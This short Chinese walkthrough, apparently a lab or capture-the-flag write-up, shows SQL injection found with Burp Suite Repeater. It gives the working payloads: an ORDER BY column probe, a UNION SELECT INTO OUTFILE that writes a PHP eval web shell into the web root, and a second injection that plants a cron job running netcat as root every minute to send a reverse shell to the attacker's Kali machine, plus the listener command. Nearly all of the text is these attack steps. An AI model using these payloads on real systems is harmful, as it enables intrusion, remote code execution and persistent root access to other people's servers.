启动burpsuite监听网页
在监听到的页面右键点击Send to Repeater

然后跳转到Repeater
在输入框输入【 ‘ 】
测试是否存在注入点
对username，password进行一个个试。如果存在会返回界面会不一样。
当我们找到注入点
可以进行字符串猜解长度

‘order by 4#  报错
‘order by 3#页面正常

有3个字段

‘union select “”,””,”<?php eval($_GET[cmd]);?>” into outfile “/var/www/888.php”#

写一句话木马（基本操作）
得到webshell
Whereis nc查找nc路径
whereis 查看命令路径

查看nc命令的绝对路径
返回/usr/bin/nc.traditional
设定定时任务反弹shell
‘union select “”,””,”* * * * * root /usr/bin/nc.traditional kail的IP 监听端口 –c /bin/sh ” into outfile “/etc/cron.d/666”#

解析* * * * *分别对应 分 时 日 月 周 

开启监听
在这里插入代码片nc -nlvp 监听端口